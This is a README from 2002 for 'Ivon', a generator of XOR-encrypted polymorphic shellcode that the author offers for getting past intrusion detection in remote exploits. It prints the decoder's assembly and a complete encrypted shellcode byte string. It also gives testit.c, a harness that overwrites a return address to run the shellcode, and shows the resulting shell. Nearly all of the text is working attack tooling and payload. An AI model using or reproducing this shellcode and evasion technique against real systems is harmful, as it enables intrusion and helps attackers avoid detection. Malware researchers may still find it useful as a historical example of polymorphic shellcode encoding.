----
Ivon  v1.0    by Nono (2002)


Presentation
************

Ivon is an encrypted shellcode generator. It uses 32bits key to perform a XOR.
Polymorphic shellcode are very easy to create.
They are very usefull to pass through IDS for remote exploits. There is only
26 constant bytes in the encrypted shellcode.

 | Decoder + 32bits Key |...       Encrypted  Shellcode   ...|
  <-------  31b ------->

The asm instructions for the decoder are:

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
   jmp .sbr

.begin:
   popl %ebx
   movl sizeof(shellcode),%ecx
   movl 32_bits_key      ,%edx

.pc:
   movl (%ebx), %eax
   jcxz .shellcode
   xor %edx,%eax
   movl %eax,(%ebx)
   dec %ecx
   inc %ebx
   jmp .pc

.sbr:
  call .begin

.shellcode:
(beginning of the shellcode)
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

I am not an asm hacker, the code may not be optimize (the smallest possible).
If u find a smartest way to decode under shellcode constraints (don't forget u
execute a code in the stack/bss), u can give me your solution.

the raw output is put in 'char decode[]'


How to compile ?
****************

Very simple !

gcc -o ivon ivon.c

Warnings are just warning.


How to use it ?
***************


nono@nono:~/ivon-1.0$ ./ivon 
Ivon 1.0 by Nono - Creation of polymophic shellcode

Key of encryption (32bit in hex no 0): 0xff112204

Encryption of Alph1 shellcode with 0xff112204 key.
Size of new shellcode: 85
Shellcode:
\xeb\x18\x5b\x31\xc9\x83\xc1\x36\xba\x04\x22\x11\xff\x8b\x03\x67\xe3\x0d\x31\xd0\x89\x03\x49\x43\xeb\xf3\xe8\xe3\xff\xff\xff\x35\xe6\x06\x13\x78\xdf\x05\x48\x23\xd7\x96\x41\xbe\xc0\xf9\x08\x40\x8e\xcf\x41\x8e\xc4\x78\xc3\x41\x3b\x45\x86\xc0\x45\x9e\xc4\x05\x48\xf9\x13\x41\x10\x88\x05\x48\x20\x14\x37\x37\x37\xe7\xaa\xa1\xa6\xe7\xbb\xa0\xc8
nono@nono:~/ivon-1.0$ 


Ivon ask u a key (32bits) for the encryption. The key musn't contains 0x00
because a shellcode can't have \0 value (to be use in a strcpy function).
Moreover, the encrypted shellcode could contains \0 because of the XOR
operation: try another password.
Then, the shellcode is display on the screen.

You can test your shellcode with the file 'testit.c':

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

 /**
 * Test your own shellcode ;)
 */

char shellcode[]="\xeb\x18\x5b\x31\xc9\x83\xc1\x36\xba\x04\x22\x11\xff\x8b\x03\x67\xe3\x0d\x31\xd0\x89\x03\x49\x43\xeb\xf3\xe8\xe3\xff\xff\xff\x35\xe6\x06\x13\x78\xdf\x05\x48\x23\xd7\x96\x41\xbe\xc0\xf9\x08\x40\x8e\xcf\x41\x8e\xc4\x78\xc3\x41\x3b\x45\x86\xc0\x45\x9e\xc4\x05\x48\xf9\x13\x41\x10\x88\x05\x48\x20\x14\x37\x37\x37\xe7\xaa\xa1\xa6\xe7\xbb\xa0\xc8";

int main()
{
  int * ret;
  *((int*) &ret+2)= (int)shellcode;
  return (0);
}


-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*

nono@nono:~/ivon-1.0$ gcc -o testit testit.c
nono@nono:~/ivon-1.0$ ./testit 
sh-2.05$ 



Command line option:

-k: to precise to key

ex: nono@nono:~/ivon-1.0$ ./ivon -k eeff4455



Final
*****

If u find mistakes, bugs or u want to put comments, my email is:
 pilon@iie.cnam.fr




EOF